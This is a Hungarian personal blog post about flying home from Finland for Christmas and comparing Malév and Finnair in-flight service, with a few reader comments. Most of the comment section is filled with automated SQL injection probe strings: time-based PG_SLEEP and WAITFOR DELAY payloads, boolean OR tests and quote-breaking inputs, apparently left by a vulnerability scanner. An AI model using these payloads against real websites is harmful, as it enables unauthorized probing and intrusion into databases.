Frenzy Blogja
Frenzy webnaplója: mindennapok Finnországban meg sok más dolog

Karácsony   (Bl0g)   
Mindenkinek ezúton kívánok Kellemes Karácsonyt és Boldog Új Évet!

Egyébként ma sikeresen hazaérkeztem. Bár Finnair jegyem volt, Malév géppel jöttem. Korábban mindig azt mondogatták, hogy a Malévnak híres a vendéglátása, jó kaját adnak, vagy legalábbis jobbat mint a konkurencia. Nos, ez az állapot mostanra végleg megszűnt. Egy nyeszlett szendvicset adtak csupán - na nem volt rossz, de semmi csoki vagy ilyesmi.

Legutóbb Finnair gépen isteni spenótos lasagnet adtak. Csokival. Csak a példa kedvéért.

De ami igazán érdekes volt a kávé, illetve hozzá való cukor és keverőkanál esete. Eddig általában úgy adták, hogy az alap tálcán adták ezeket. Gondolom a spórolás nevében ezt most szintén lehagyták a Malév gépen. Alapvetően helyes gondolat, elvégre sokan csak kidobták úgyis, felesleges lenne szétosztani. De a megoldás most úgy működik, hogy egy tálcán odanyújták ezeket a kliensnek és ő elveheti amire szüksége van. De a keverőkanalak szabadon ott vannak a tálcán, és az, hogy mindenki össze-vissza fogdossa őket miközben megpróbál kivenni egyet nem éppen higenikus megoldás :(

De ugyanakkor új rekordot sikerült felállítani, 7 óra 25 perc ajtótól ajtóig. :-)

 

Hozzászólások

(select 198766*667891 from DUAL) Re: Karácsony



(select 198766*667891) Re: Karácsony



@@DdGmw Re: Karácsony



1����%2527%2522\'\" Re: Karácsony



1'" Re: Karácsony



1tISGzG3n' OR 427=(SELECT 427 FROM PG_SLEEP(15))-- Re: Karácsony



1-1)) OR 351=(SELECT 351 FROM PG_SLEEP(15))-- Re: Karácsony



1-1) OR 841=(SELECT 841 FROM PG_SLEEP(15))-- Re: Karácsony



1-1 OR 76=(SELECT 76 FROM PG_SLEEP(15))-- Re: Karácsony



13W3xytBQ')); waitfor delay '0:0:15' -- Re: Karácsony



1wYb5KfC1'); waitfor delay '0:0:15' -- Re: Karácsony



1kGj3Sxyd'; waitfor delay '0:0:15' -- Re: Karácsony



1-1 waitfor delay '0:0:15' -- Re: Karácsony



1-1)); waitfor delay '0:0:15' -- Re: Karácsony



1-1); waitfor delay '0:0:15' -- Re: Karácsony



1-1; waitfor delay '0:0:15' -- Re: Karácsony



-1" OR 5*5=26 or "PN4vch6B"=" Re: Karácsony



-1" OR 5*5=25 or "PN4vch6B"=" Re: Karácsony



-1' OR 5*5=26 or 'ZdokGmax'=' Re: Karácsony



-1' OR 5*5=25 or 'ZdokGmax'=' Re: Karácsony



-1" OR 5*5=26 -- Re: Karácsony



-1" OR 5*5=25 -- Re: Karácsony



-1' OR 5*5=26 -- Re: Karácsony



-1' OR 5*5=25 -- Re: Karácsony



-1 OR 5*5=26 Re: Karácsony



-1 OR 5*5=25 Re: Karácsony



-1 OR 5*5=26 -- Re: Karácsony



-1 OR 5*5=25 -- Re: Karácsony



1WfBql71a Re: Karácsony



(select 198766*667891 from DUAL) Re: Karácsony


(select 198766*667891) Re: Karácsony


@@2gihg Re: Karácsony


1����%2527%2522\'\" Re: Karácsony


1'" Re: Karácsony


1OGNALEJa' OR 475=(SELECT 475 FROM PG_SLEEP(15))-- Re: Karácsony


1-1)) OR 163=(SELECT 163 FROM PG_SLEEP(15))-- Re: Karácsony


1-1) OR 806=(SELECT 806 FROM PG_SLEEP(15))-- Re: Karácsony


1-1 OR 103=(SELECT 103 FROM PG_SLEEP(15))-- Re: Karácsony


19Qg6nD4t')); waitfor delay '0:0:15' -- Re: Karácsony


1sb8vqmXC'); waitfor delay '0:0:15' -- Re: Karácsony


14gWfnB0Q'; waitfor delay '0:0:15' -- Re: Karácsony


1-1 waitfor delay '0:0:15' -- Re: Karácsony


1-1)); waitfor delay '0:0:15' -- Re: Karácsony


1-1); waitfor delay '0:0:15' -- Re: Karácsony


1-1; waitfor delay '0:0:15' -- Re: Karácsony


-1" OR 5*5=26 or "x0DXcQxY"=" Re: Karácsony


-1" OR 5*5=25 or "x0DXcQxY"=" Re: Karácsony


-1' OR 5*5=26 or 'MndXTkuF'=' Re: Karácsony


-1' OR 5*5=25 or 'MndXTkuF'=' Re: Karácsony


-1" OR 5*5=26 -- Re: Karácsony


-1" OR 5*5=25 -- Re: Karácsony


-1' OR 5*5=26 -- Re: Karácsony


-1' OR 5*5=25 -- Re: Karácsony


-1 OR 5*5=26 Re: Karácsony


-1 OR 5*5=25 Re: Karácsony


-1 OR 5*5=26 -- Re: Karácsony


-1 OR 5*5=25 -- Re: Karácsony


11azjzM43 Re: Karácsony


Frenzy Re: Karácsony
30-án jöttem vissza este, Szilveszter már itt volt. De szabin tovább voltam, tegnap dolgoztam először.
Pali Re: Karácsony
És meddig maradsz itthon? Meddig vagy szabadságon? :-)
Frenzy Re: Karácsony
Inkább olyan 9 óra ami a megszokott volt, még ilyen külön transzfer szolgáltatással is. Vonattal még több (bár nem tudom az hogyan módosít ezen, hogy az IC megáll Ferihegy 1-nél ... akkor is várni kell, hogy jöjjön IC meg reménykedni, hogy épp nincs sztrájk :-D)
Pali Re: Karácsony
Ismét nagyon boldog karácsonyt és újévet kívánok! :)



U.i.: Egyébként mennyi szokott lenni a menetidőd repülővel ajtótól ajtóig?
Pannóca Re: Karácsony
Tyűha, az tényleg gyors volt. :)

Neked is Karajcsont és Bújjék!